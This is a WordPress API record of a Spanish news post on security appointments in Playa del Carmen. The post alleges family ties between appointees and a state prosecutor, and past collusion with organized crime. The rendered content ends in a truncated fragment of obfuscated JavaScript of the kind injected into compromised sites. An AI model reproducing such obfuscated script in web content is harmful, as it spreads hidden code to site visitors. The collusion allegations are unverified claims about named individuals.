{"id":23456,"date":"2025-08-14T01:42:04","date_gmt":"2025-08-14T01:42:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23456"},"modified":"2025-08-14T01:42:05","modified_gmt":"2025-08-14T01:42:05","slug":"sobrino-y-cunado-de-raciel-lopez-como-comandantes-en-playa-del-carmen","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23456","title":{"rendered":"SOBRINO Y CU\u00d1ADO DE RACIEL L\u00d3PEZ COMO COMANDANTES EN PLAYA DEL CARMEN"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"384\" data-id=\"23457\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000277017.jpg\" alt=\"\" class=\"wp-image-23457\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000277017.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000277017-300x160.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000277017-310x165.jpg 310w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"23458\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000277014-1024x682.jpg\" alt=\"\" class=\"wp-image-23458\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000277014-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000277014-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000277014-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000277014-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000277014.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"23459\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000277011-1024x683.jpg\" alt=\"\" class=\"wp-image-23459\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000277011-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000277011-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000277011-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000277011.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Agencia Reporte Ciudadano<\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez. La ma\u00f1ana de este mi\u00e9rcoles en #QuintanaRoo #PlayadelCarmen Anunci\u00f3 Carlos Montesinos, secretario de Seguridad de Playa del Carmen, nuevos nombramientos: Jorge Alexis Zuart, subsecretario Seguridad P\u00fablica (ex secretario de Seguridad P\u00fablica municipal de Tuxtla); Eleaquin Castro P\u00e9rez, director seguridad ( ex escolta de Zuarth); Rodolfo L\u00f3pez Zapata, Asuntos Internos; y Aureny Sugeydi Mart\u00edn Manzanilla, Tr\u00e1nsito.<\/p>\n\n\n\n<p>Cabe se\u00f1alar que Alexis es cu\u00f1ado de el Fiscal General de ese estado, Raciel L\u00f3pez Salazar, Mientras que Rolfo L\u00f3pez su sobrino.<\/p>\n\n\n\n<p>A Alexis y Eleaquin, en su administraci\u00f3n tuxtleca fueron se\u00f1alados en diversos mensajes y mantas por estar coludidos con un grupo del Cr1m3n Organizado, investigaciones que no se llevaron a cabo por la relaci\u00f3n familiar con RLZ.<\/p>\n\n\n\n<p>Los nuevos nombramientos llegan a reforzar el equipo chiapaneco que opera en el lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Agencia Reporte Ciudadano Tuxtla Guti\u00e9rrez. La ma\u00f1ana de este mi\u00e9rcoles en #QuintanaRoo #PlayadelCarmen Anunci\u00f3 Carlos Montesinos, secretario de Seguridad de Playa del Carmen, nuevos nombramientos: Jorge Alexis Zuart, subsecretario Seguridad P\u00fablica (ex secretario de Seguridad P\u00fablica municipal de Tuxtla); Eleaquin Castro P\u00e9rez, director seguridad ( ex escolta de Zuarth); Rodolfo L\u00f3pez Zapata, Asuntos Internos; y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23458,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-23456","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23456","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23456"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23456\/revisions"}],"predecessor-version":[{"id":23460,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23456\/revisions\/23460"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23458"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23456"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23456"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23456"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}